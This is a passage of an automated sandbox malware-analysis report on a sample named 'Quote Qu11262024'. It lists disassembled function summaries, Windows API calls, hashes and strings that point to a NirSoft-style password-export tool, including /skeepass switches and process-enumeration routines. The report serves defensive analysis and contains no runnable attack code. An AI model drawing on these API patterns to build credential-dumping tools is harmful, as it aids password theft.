                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2012295524-70141382
                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1700100422-0
                                                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 552707033-0
                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                    • String ID: 4$h
                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: %%0.%df
                                                                                                    • API String ID: 3473751417-763548558
                                                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                    • String ID: A
                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                    APIs
                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 973020956-4135340389
                                                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy
                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                    • API String ID: 1284135714-318151290
                                                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 290601579-0
                                                                                                    • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                    • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                    APIs
                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
